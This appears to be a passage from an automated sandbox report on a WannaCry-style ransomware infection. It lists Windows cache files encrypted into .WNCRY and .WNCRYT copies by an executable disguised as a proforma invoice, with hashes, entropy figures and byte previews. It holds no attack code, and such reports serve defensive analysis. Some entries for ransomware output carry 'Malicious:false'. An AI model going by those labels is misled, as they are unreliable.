                                                          SHA-256:98020AD11DB815E712CB460A6BDC140A68379F8F466284B8B91A1D747DB2B848
                                                          SHA-512:C52783447CCC285F7768AA0E4E404953114F2801639658F879ECB557D8597085136D4ED86F6B1C3B529253320254FDC5AE88F560D4621AA3FA73C58F906FDF95
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....t....8..M....Q...]..........t...r.4^vv....#,f.......:_._DM...S.<#..X........ Y..H...lL".!...;....b.N..\.~..R.....\...m .|Q.l.T. F.dV.zoiN.+_.4w....aE}^2...@.vB..J..zW.....\Q..d...&.{.....$.`G..w.Zf#.q..i.N.......&#_.%.C...\......Q.....G(.....*.g................D.X2..Dh..M.....`../..[a..s.k

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.221937557171516
                                                          Encrypted:false
                                                          SSDEEP:6:bkEdO8W6olIXLhefuCPrVbQIf7GqdHjBPbBK0uAQkSBO:bkE0961LhWuYrVcIGqhBPb8XffO
                                                          MD5:CD5D0CBB6412E5F98D523AE12D22649F
                                                          SHA1:1B66213B3C495AEB9BE0F9DB3672DAC376AAAA96
                                                          SHA-256:98020AD11DB815E712CB460A6BDC140A68379F8F466284B8B91A1D747DB2B848
                                                          SHA-512:C52783447CCC285F7768AA0E4E404953114F2801639658F879ECB557D8597085136D4ED86F6B1C3B529253320254FDC5AE88F560D4621AA3FA73C58F906FDF95
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....t....8..M....Q...]..........t...r.4^vv....#,f.......:_._DM...S.<#..X........ Y..H...lL".!...;....b.N..\.~..R.....\...m .|Q.l.T. F.dV.zoiN.+_.4w....aE}^2...@.vB..J..zW.....\Q..d...&.{.....$.`G..w.Zf#.q..i.N.......&#_.%.C...\......Q.....G(.....*.g................D.X2..Dh..M.....`../..[a..s.k

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.157338268971449
                                                          Encrypted:false
                                                          SSDEEP:6:bkETTn7uGEzSZYGqlmURPwjBiQfoaaPlop6LvwQpv6jGEncV:bkETTn7zEzdGxQPwYkslyUvwQpv6yEnW
                                                          MD5:5FC81FCA275F26CFA93D597C6BD2EA39
                                                          SHA1:D3CFE67710F12413185BFA11849CA584F81B642D
                                                          SHA-256:CA888D49179961FB2FACD0746B8A785C6C293188A96409908C8BC978BEFBDE4C
                                                          SHA-512:2A64DFFB7F5CA130985EC5436226FD28FD2AABE6F68ED0E5398C8D40513E1DDE82B02FA18FDE74E86EFC2F93FBC61913F0505FAD2DBD47C39944F95A3AFBD79F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....S..^y......3..o..,.......*.......k.?<yQn....X<.....U..n......q.J.....rqe]D*.f...j/x.........I...c...."B".n...].9kf......t.[..^D.q..}.......7...sa..C..U+o*Gma.p.R....".....{|>gy.`..8.%q....Fb.t.....c..2J..E>.Yx........G...La.q..m.%..']x.p...Z.N1..Y...............e....w...I.......N.!.R.....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.157338268971449
                                                          Encrypted:false
                                                          SSDEEP:6:bkETTn7uGEzSZYGqlmURPwjBiQfoaaPlop6LvwQpv6jGEncV:bkETTn7zEzdGxQPwYkslyUvwQpv6yEnW
                                                          MD5:5FC81FCA275F26CFA93D597C6BD2EA39
                                                          SHA1:D3CFE67710F12413185BFA11849CA584F81B642D
                                                          SHA-256:CA888D49179961FB2FACD0746B8A785C6C293188A96409908C8BC978BEFBDE4C
                                                          SHA-512:2A64DFFB7F5CA130985EC5436226FD28FD2AABE6F68ED0E5398C8D40513E1DDE82B02FA18FDE74E86EFC2F93FBC61913F0505FAD2DBD47C39944F95A3AFBD79F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....S..^y......3..o..,.......*.......k.?<yQn....X<.....U..n......q.J.....rqe]D*.f...j/x.........I...c...."B".n...].9kf......t.[..^D.q..}.......7...sa..C..U+o*Gma.p.R....".....{|>gy.`..8.%q....Fb.t.....c..2J..E>.Yx........G...La.q..m.%..']x.p...Z.N1..Y...............e....w...I.......N.!.R.....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999862052207
                                                          Encrypted:true
                                                          SSDEEP:24576:z41MnDUgyv2ujySEA6UuR2kL6GMCKMlq9Oyey6E:lnDAaSEAsIihMCKbF
                                                          MD5:7CDA6445A180ED78562874419F4FD099
                                                          SHA1:9A9A6A257CEAAE0CC6176CC473DCEEA67756EC6C
                                                          SHA-256:39526CF710DDB5E2E5D0C0988EAE1E3EA532C9A2D5A2F42C26E353C0F249D0B9
                                                          SHA-512:502886ED50AEF15D423B944544C69B514BA494D2854A29F1FA2099C74A09A6D371F1A5863FF2C4E6B129AF49716E0134B1DEBFC1BEB2D044658F8CF66650192F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....dQb9.QU....&VD..:um6V...!._.^ .\|XX..".....8..c._>1..a.....8.v.EoK0........8.<,.i.W....|.Z%...@.rbd.U..d.....W..0b8e..-..m.......^g.F..s...=.H.$E._5K.|.$w/..Q.\...@..q...y.[p....J...TQg...d.2.T..-qG........Z...X...+I..Qf........L....R.F@.................[E.A.H.X..}.1.5.>.b...Ms=4.M..;k..%FD.^....L.v..V..<.S.......5A.+.u...Ej.....h......i....Pv.`L.|X7.D.K.1kW~..B..;......{.q";.....E..vS.1.;...u..j..1.u....=.iI-r.....6.......N..{.i...OP_-...r.@0.y...&...}V.....^.L......5j.TM...O.G..44d..7K....qk{?.~/b....6j........#I.;.......nIj....AA%..../ 1..7.E......||*.............\..[.......W............xsu.......\...........P...B...1g.......e5$.1HO....I5..@....D3.......L.q...6A9.0..%....7..].E.xd./......Y".........$.7...7.0...>."+O.<..o....^L8Y*"$q}f.R..t@...Sg..H(....97$`..|...U.Q...J.0..~@.C.S..7......'...Le..{.{...Q&mY,.wv.......!..I..h.s..M%.8?...c.)..Rmy...._..~...0V.....fg.....k...././...&....gXq.W...a..Cf..<]I.ds.ER\.%.,.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999862052207
                                                          Encrypted:true
                                                          SSDEEP:24576:z41MnDUgyv2ujySEA6UuR2kL6GMCKMlq9Oyey6E:lnDAaSEAsIihMCKbF
                                                          MD5:7CDA6445A180ED78562874419F4FD099
                                                          SHA1:9A9A6A257CEAAE0CC6176CC473DCEEA67756EC6C
                                                          SHA-256:39526CF710DDB5E2E5D0C0988EAE1E3EA532C9A2D5A2F42C26E353C0F249D0B9
                                                          SHA-512:502886ED50AEF15D423B944544C69B514BA494D2854A29F1FA2099C74A09A6D371F1A5863FF2C4E6B129AF49716E0134B1DEBFC1BEB2D044658F8CF66650192F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....dQb9.QU....&VD..:um6V...!._.^ .\|XX..".....8..c._>1..a.....8.v.EoK0........8.<,.i.W....|.Z%...@.rbd.U..d.....W..0b8e..-..m.......^g.F..s...=.H.$E._5K.|.$w/..Q.\...@..q...y.[p....J...TQg...d.2.T..-qG........Z...X...+I..Qf........L....R.F@.................[E.A.H.X..}.1.5.>.b...Ms=4.M..;k..%FD.^....L.v..V..<.S.......5A.+.u...Ej.....h......i....Pv.`L.|X7.D.K.1kW~..B..;......{.q";.....E..vS.1.;...u..j..1.u....=.iI-r.....6.......N..{.i...OP_-...r.@0.y...&...}V.....^.L......5j.TM...O.G..44d..7K....qk{?.~/b....6j........#I.;.......nIj....AA%..../ 1..7.E......||*.............\..[.......W............xsu.......\...........P...B...1g.......e5$.1HO....I5..@....D3.......L.q...6A9.0..%....7..].E.xd./......Y".........$.7...7.0...>."+O.<..o....^L8Y*"$q}f.R..t@...Sg..H(....97$`..|...U.Q...J.0..~@.C.S..7......'...Le..{.{...Q&mY,.wv.......!..I..h.s..M%.8?...c.)..Rmy...._..~...0V.....fg.....k...././...&....gXq.W...a..Cf..<]I.ds.ER\.%.,.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.23081917580081
                                                          Encrypted:false
                                                          SSDEEP:6:bkEMtOMoL/rLN69TuhCBNKvJacF/vmcex5xjym2Psy2dcF:bkEMwMw/DQqJ9JecG5x5tjdcF
                                                          MD5:2AE4559FAA47DC3B9281B2E7FAD9F997
                                                          SHA1:04AD827A18F704979C84B8F17852108CFC4966F5
                                                          SHA-256:E7D0E4BB5CC391308743A849AB3B3ADD1936E693AE6A91638E4F63442D55E296
                                                          SHA-512:F767683A8CA2AFAACE441381EB44C4B9B1667CF20EA34A992194FBA0C150335668B5991C0839E3FA8C00E81FE3F6590499C822FFA8E6C5A7022F2C7A325FAE65
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....A.|o...WZ'...*a...{6.>..%4.FJ.[.R......~...o\=i3/UZ.hN.{.._...?.R.H.Y..j<B<..d+C0...=..t=hG._.....O...6..OZ....o_...(/6......1F>c`..[.f.1.`L.x.......dz^...,..(..+.$.>%h8.x.Q...H.._.L+...e..o;....99_...T+.z...$.k..w..e.t....'7......L.......c.?...............z.:....v.t...gl....@...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.23081917580081
                                                          Encrypted:false
                                                          SSDEEP:6:bkEMtOMoL/rLN69TuhCBNKvJacF/vmcex5xjym2Psy2dcF:bkEMwMw/DQqJ9JecG5x5tjdcF
                                                          MD5:2AE4559FAA47DC3B9281B2E7FAD9F997
                                                          SHA1:04AD827A18F704979C84B8F17852108CFC4966F5
                                                          SHA-256:E7D0E4BB5CC391308743A849AB3B3ADD1936E693AE6A91638E4F63442D55E296
                                                          SHA-512:F767683A8CA2AFAACE441381EB44C4B9B1667CF20EA34A992194FBA0C150335668B5991C0839E3FA8C00E81FE3F6590499C822FFA8E6C5A7022F2C7A325FAE65
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....A.|o...WZ'...*a...{6.>..%4.FJ.[.R......~...o\=i3/UZ.hN.{.._...?.R.H.Y..j<B<..d+C0...=..t=hG._.....O...6..OZ....o_...(/6......1F>c`..[.f.1.`L.x.......dz^...,..(..+.$.>%h8.x.Q...H.._.L+...e..o;....99_...T+.z...$.k..w..e.t....'7......L.......c.?...............z.:....v.t...gl....@...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999840312041892
                                                          Encrypted:true
                                                          SSDEEP:24576:0PjjjRWD9kF5rfuPXzOIuVBvK6kODqIJCl7GBtbbhjEXV:wjMpkF5DKuVBvTk54CABt2l
                                                          MD5:E7D05C4CC49F6CEF61597901E3F461EA
                                                          SHA1:B682F7FA28DB7C15BD6E73C1E07A6427EC721164
                                                          SHA-256:AE31AC0D47B06A544C73A50E35410684E46C7B999D382B73856FA7A605EF6BA2
                                                          SHA-512:67437539F04B3675E29763ABC2E1AA2DFAE2A1268221CEDA6240042710DDB741936FBE37274E2B322B0C85A08B8D9A45B2D24D52FA910C8396C1D1DE00847A30
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......d.O.v..)...F.+.5.3..9......d..)......4.2.7..y.....Ay.).?.....l....KQ.:]....L...... x.$$..f..(.C..V$Y...k....c.JI.......QK.....q......L:..B......f.0..\J*.....G...!B..h...p.x.%...6.....+.%L..7X.....Tz.EU....;.$"......>7Si..:c...x.+w..p/~>.................j...4.B...h|... .sY/.9wD.%..e..\#<]L6..\..wR.6.V..|).i.w.0. ....[.../66..Q...R}S.M.5....B....yE=XNo_S.(v.}.........%..........q<....:E=5J...u..b....x...$C.o.`.,..].M..p.Xe....m]Q..I.)....%.....<Q.yT.....C...U..yN...oU.L9...b....@8..,..W@H;eLa....j[hY...g..A...(....e.c..N...Z.E.FJ.........G@..4..?..R..}.c.y...%...o>..iQ.g.p|bO(.V...Xh....Z....K.:..~.x{..$.../.rv3.W..@O.J...1..g..'DH.V.i....M.._6O.BDOg.$5Z].?........w...~.0. ...C.>B.7.GUY...FX.}..`R...;;n;".}....#.;..i+..;A...Z...]n?.R\.d..UM..:.....-......*v_.Q.............hx...-.;3".P....0.yJ......E.rK..L..O&n..7.2s...o.p..N9.}..5.p..q.Xz...s....O......`g.. .q.1.^.*...)..@...A..yf.(S\...K..Y.WG..#.C...G,B....@i.....$.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999840312041892
                                                          Encrypted:true
                                                          SSDEEP:24576:0PjjjRWD9kF5rfuPXzOIuVBvK6kODqIJCl7GBtbbhjEXV:wjMpkF5DKuVBvTk54CABt2l
                                                          MD5:E7D05C4CC49F6CEF61597901E3F461EA
                                                          SHA1:B682F7FA28DB7C15BD6E73C1E07A6427EC721164
                                                          SHA-256:AE31AC0D47B06A544C73A50E35410684E46C7B999D382B73856FA7A605EF6BA2
                                                          SHA-512:67437539F04B3675E29763ABC2E1AA2DFAE2A1268221CEDA6240042710DDB741936FBE37274E2B322B0C85A08B8D9A45B2D24D52FA910C8396C1D1DE00847A30
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......d.O.v..)...F.+.5.3..9......d..)......4.2.7..y.....Ay.).?.....l....KQ.:]....L...... x.$$..f..(.C..V$Y...k....c.JI.......QK.....q......L:..B......f.0..\J*.....G...!B..h...p.x.%...6.....+.%L..7X.....Tz.EU....;.$"......>7Si..:c...x.+w..p/~>.................j...4.B...h|... .sY/.9wD.%..e..\#<]L6..\..wR.6.V..|).i.w.0. ....[.../66..Q...R}S.M.5....B....yE=XNo_S.(v.}.........%..........q<....:E=5J...u..b....x...$C.o.`.,..].M..p.Xe....m]Q..I.)....%.....<Q.yT.....C...U..yN...oU.L9...b....@8..,..W@H;eLa....j[hY...g..A...(....e.c..N...Z.E.FJ.........G@..4..?..R..}.c.y...%...o>..iQ.g.p|bO(.V...Xh....Z....K.:..~.x{..$.../.rv3.W..@O.J...1..g..'DH.V.i....M.._6O.BDOg.$5Z].?........w...~.0. ...C.>B.7.GUY...FX.}..`R...;;n;".}....#.;..i+..;A...Z...]n?.R\.d..UM..:.....-......*v_.Q.............hx...-.;3".P....0.yJ......E.rK..L..O&n..7.2s...o.p..N9.}..5.p..q.Xz...s....O......`g.. .q.1.^.*...)..@...A..yf.(S\...K..Y.WG..#.C...G,B....@i.....$.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.1660764484283135
                                                          Encrypted:false
                                                          SSDEEP:6:bkERFGTKbGnyFRzJtG6gYj5pBf3EcNp1PtXq5OI:bkEonyblVflDfVNPlLI
                                                          MD5:D49713A33F39A27C8AF9E991C4F68321
                                                          SHA1:4BAB4C5523BAA2866F3024BA265367CDD7F161E8
                                                          SHA-256:C137002B29C1E50A431C84AF5947E74EECEDAE1F5CBA2580564EA8CF88E10633
                                                          SHA-512:81153825DBFEB790429176073AD32C78E39675A850338FDAE3B18B58CF78FCD20EAECB78C353291266FB9F16E8B4CA86E33032CBBA0C42A16A17A5E44968B92D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....m.......v...\.3.....KO.....Q.t.....u.Ld+..n........<.I.xU......Kb.......e....A.R.,.D!..P.......dIH42...>....@P.~/.,...&.F.d4.<q.3.;..V...o.C.I..(TD.j.......;.o..}..@2z.-4.4.X*......=.h.0Y.]..PW..@.6A.wERWY..M.....wC.$h..^..i.qE...`@..aXU.k.k..)L..............j....9Pf.~.W..6..+W.m.^4.v].

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.1660764484283135
                                                          Encrypted:false
                                                          SSDEEP:6:bkERFGTKbGnyFRzJtG6gYj5pBf3EcNp1PtXq5OI:bkEonyblVflDfVNPlLI
                                                          MD5:D49713A33F39A27C8AF9E991C4F68321
                                                          SHA1:4BAB4C5523BAA2866F3024BA265367CDD7F161E8
                                                          SHA-256:C137002B29C1E50A431C84AF5947E74EECEDAE1F5CBA2580564EA8CF88E10633
                                                          SHA-512:81153825DBFEB790429176073AD32C78E39675A850338FDAE3B18B58CF78FCD20EAECB78C353291266FB9F16E8B4CA86E33032CBBA0C42A16A17A5E44968B92D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....m.......v...\.3.....KO.....Q.t.....u.Ld+..n........<.I.xU......Kb.......e....A.R.,.D!..P.......dIH42...>....@P.~/.,...&.F.d4.<q.3.;..V...o.C.I..(TD.j.......;.o..}..@2z.-4.4.X*......=.h.0Y.]..PW..@.6A.wERWY..M.....wC.$h..^..i.qE...`@..aXU.k.k..)L..............j....9Pf.~.W..6..+W.m.^4.v].

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999811213678692
                                                          Encrypted:true
                                                          SSDEEP:24576:GaMjTvLOskGEjQQKbj32Wx3EIX9b9XbG8CnZbBVsMiJWfBtR:yvDOskGEkQwf3EObsbPB757
                                                          MD5:40BB7702925988B2A16D94D415D09520
                                                          SHA1:0DA19AC7A13B76E3793F4D22B3AC2E44D013EC96
                                                          SHA-256:BF85BE469413BFBA402993560F8A30E741DC666837D0DF31424EC6319B45152B
                                                          SHA-512:C3465129A2B6A4151C14D4AC43FAA8C2491525CE57CC227083FC3DEFEF855FE7F74E630E07D8BC0EBD7CBCE448D740B1DEACF578CCD176C4B0E4DA0955617B80
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......g7MK.4l..w.q.U..6....1....3..O.J........8..-.*........4".9b.F.%.x.=/.....V.a........,O[a..B.S...<...L6>..s../\L.Y,=)....E..<$GZ.r..(..._..... ...._c...:.....Jea....l..<..h-..b(.j.....o.Y.K.N..._.|..f.*.1...w.:...P2...dJ.w...{...HP...Q.[Y.n...v.................:hR.M=q._.3..W..1P.A..tg..R.>..T...........V.....?.S.d..a.QPk}..+7..@..y..i..&K.%..-..n.;(....<S..T..%....c.$..N`..Z........v.7..a'a......3..f..a/.n...{6o...6rX[...l.%.I_...p:..|U....l0.U.K.i.iX..._6K......0..~.B.Hi...AVHe...i.I.<..l.....&(.....p......tg..@....T./H.}....y.....?>..A..M?}.Mm=>....j....Z.2.%.....t8.#.-16.i..c....M.cXf..ti......?.....I..pn.s<>..K....RuqJ.d...t..&..d.i..K.<H....3e.%...J..f~.......)...%}..!+.a.L.7.:....../.m...[Y.j/....YQg....~..S.w....?..}4.....1IA.b..&../l...}|..o.S..2.U.Y..o.`.....P.T^.O.g8..............Z...39.w]k.Y..x.U.6....5f..&=..:)..i$..f..EU&.......Q.a....m;.....s[Z.r<...H.4J.8.....M....C..._U..We.0...B...=.LL. ..k..).."M..k4

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999811213678692
                                                          Encrypted:true
                                                          SSDEEP:24576:GaMjTvLOskGEjQQKbj32Wx3EIX9b9XbG8CnZbBVsMiJWfBtR:yvDOskGEkQwf3EObsbPB757
                                                          MD5:40BB7702925988B2A16D94D415D09520
                                                          SHA1:0DA19AC7A13B76E3793F4D22B3AC2E44D013EC96
                                                          SHA-256:BF85BE469413BFBA402993560F8A30E741DC666837D0DF31424EC6319B45152B
                                                          SHA-512:C3465129A2B6A4151C14D4AC43FAA8C2491525CE57CC227083FC3DEFEF855FE7F74E630E07D8BC0EBD7CBCE448D740B1DEACF578CCD176C4B0E4DA0955617B80
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......g7MK.4l..w.q.U..6....1....3..O.J........8..-.*........4".9b.F.%.x.=/.....V.a........,O[a..B.S...<...L6>..s../\L.Y,=)....E..<$GZ.r..(..._..... ...._c...:.....Jea....l..<..h-..b(.j.....o.Y.K.N..._.|..f.*.1...w.:...P2...dJ.w...{...HP...Q.[Y.n...v.................:hR.M=q._.3..W..1P.A..tg..R.>..T...........V.....?.S.d..a.QPk}..+7..@..y..i..&K.%..-..n.;(....<S..T..%....c.$..N`..Z........v.7..a'a......3..f..a/.n...{6o...6rX[...l.%.I_...p:..|U....l0.U.K.i.iX..._6K......0..~.B.Hi...AVHe...i.I.<..l.....&(.....p......tg..@....T./H.}....y.....?>..A..M?}.Mm=>....j....Z.2.%.....t8.#.-16.i..c....M.cXf..ti......?.....I..pn.s<>..K....RuqJ.d...t..&..d.i..K.<H....3e.%...J..f~.......)...%}..!+.a.L.7.:....../.m...[Y.j/....YQg....~..S.w....?..}4.....1IA.b..&../l...}|..o.S..2.U.Y..o.`.....P.T^.O.g8..............Z...39.w]k.Y..x.U.6....5f..&=..:)..i$..f..EU&.......Q.a....m;.....s[Z.r<...H.4J.8.....M....C..._U..We.0...B...=.LL. ..k..).."M..k4

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999828936303695
                                                          Encrypted:true
                                                          SSDEEP:24576:i+qCimD7b0/JTExSgaFELTIqk9dGTTVL5kqYfZS:UCie7b0Kozqk9M/jBb
                                                          MD5:92C4922595FCEB09E9D43E9C8A29610F
                                                          SHA1:2BDC2DF34E3D283E71F5F36E4059CA29C9397C13
                                                          SHA-256:726CC680AFE039DD73115F3AC417938BA5CDBAC12DA8CCCF424218C0EF96E371
                                                          SHA-512:D5C37CE3362768905A1FDA5BCE84C3D3544BBB7100048218FF34A417FED6C0459F1C8923680D7E9DF0E964517B448EB78918FA15107A63E724752DDA0982320C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....s/..iV.....gY...*.;L{..U.UvS..x......L..R./.N..6.z...vl..C#..aN].$..V.X......F.^......E....((.#. 0.)2...\e.]...\.&...(.p."g.5r...%.#@....j..[.k../.....|....G..&c......Y........\.._v..4_.!.?.../.z...q. .N.._.w.-..g.............tz..i}K.}.Uj2[.P.............s.8.r....7..m../..$X..c..1G.<%..o.u.1`..-\.&<.$......~.....G2...t}a...`...fP......?~(7..K..'.J...J..%..z....~......Z...'.......s...m.2.fmq.X.O...W...c..n.".....5....K.S....DNt.k.O..\ ..N"....L[.x+..pg{..Y..:T7..0..u..3R.fq5..O...{...x..+G...lR..j..X@&.....}.\....r^.#.~.i..Y......&S.E..y.<.K*9.T.z`....QK.=>..^.n.Vo...Y.!d_...C.......\.*.-.{...*._...K/b......v#`...*.e........t..XFx...tD...0.`v;n._.J..{....sp...>LE8h.n8..H:W.....'SYU`w..53..6..TIc.k%.m...*.I^Vh.W...^..3....1.3.K.8.m..V..{..([.....Q...?...Y......$2...0D..o|..r..../.d..C,."g...(\.@D"5^.W.lz.....4X....n.|..{>..f.R.[L^.\.K.....4.x&...p.x..4f.2..P....Wd..cf.r..d ecF.=...pP...2....x.....,..........,.pA..... ..?g

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999828936303695
                                                          Encrypted:true
                                                          SSDEEP:24576:i+qCimD7b0/JTExSgaFELTIqk9dGTTVL5kqYfZS:UCie7b0Kozqk9M/jBb
                                                          MD5:92C4922595FCEB09E9D43E9C8A29610F
                                                          SHA1:2BDC2DF34E3D283E71F5F36E4059CA29C9397C13
                                                          SHA-256:726CC680AFE039DD73115F3AC417938BA5CDBAC12DA8CCCF424218C0EF96E371
                                                          SHA-512:D5C37CE3362768905A1FDA5BCE84C3D3544BBB7100048218FF34A417FED6C0459F1C8923680D7E9DF0E964517B448EB78918FA15107A63E724752DDA0982320C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....s/..iV.....gY...*.;L{..U.UvS..x......L..R./.N..6.z...vl..C#..aN].$..V.X......F.^......E....((.#. 0.)2...\e.]...\.&...(.p."g.5r...%.#@....j..[.k../.....|....G..&c......Y........\.._v..4_.!.?.../.z...q. .N.._.w.-..g.............tz..i}K.}.Uj2[.P.............s.8.r....7..m../..$X..c..1G.<%..o.u.1`..-\.&<.$......~.....G2...t}a...`...fP......?~(7..K..'.J...J..%..z....~......Z...'.......s...m.2.fmq.X.O...W...c..n.".....5....K.S....DNt.k.O..\ ..N"....L[.x+..pg{..Y..:T7..0..u..3R.fq5..O...{...x..+G...lR..j..X@&.....}.\....r^.#.~.i..Y......&S.E..y.<.K*9.T.z`....QK.=>..^.n.Vo...Y.!d_...C.......\.*.-.{...*._...K/b......v#`...*.e........t..XFx...tD...0.`v;n._.J..{....sp...>LE8h.n8..H:W.....'SYU`w..53..6..TIc.k%.m...*.I^Vh.W...^..3....1.3.K.8.m..V..{..([.....Q...?...Y......$2...0D..o|..r..../.d..C,."g...(\.@D"5^.W.lz.....4X....n.|..{>..f.R.[L^.\.K.....4.x&...p.x..4f.2..P....Wd..cf.r..d ecF.=...pP...2....x.....,..........,.pA..... ..?g

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.213687836159957
                                                          Encrypted:false
                                                          SSDEEP:6:bkE8sRWkDRriKcnfErGMj/KzVilsNjvflwr48+cDAc:bkE83kDfccrGMj/OViqN+4sH
                                                          MD5:1CD07CF5AEF717CC818F8CB471B101D3
                                                          SHA1:EE3FF77B5F3D45BB6F0351FCD5CE247CEA095D67
                                                          SHA-256:322513E35EB04043F1D2434036B5BBF8D40738E9A4C3D7623164E3947D8B145E
                                                          SHA-512:F53BC7EBFF44A639CA2D02E1D5A415543F2FC85B713BE787BD7C6FD76646D4D2B4AAC37EA0E9E5FDB0AD1E808C49E7CF8339282FA17539A0DD5E87C12F5AAB18
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....1.n ..[Y.V.9%..OH....z.O..C9T...].ujm....&.......?.Z......bNL.(../}a.L.........M..t....>.#}...R..A6..B.N.G..q..(.dm`..;...Z2...j.`...p..#...E...q_.(s..m5....d....O..hz7[\;_ ....LV....f7.HG.A:.......8y....../....pEc..J. J*.....jf.{.Z......6I.\.MX..............y.....( ^.5...)q.......u...\.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db.WNCRYT

                                                          Download File
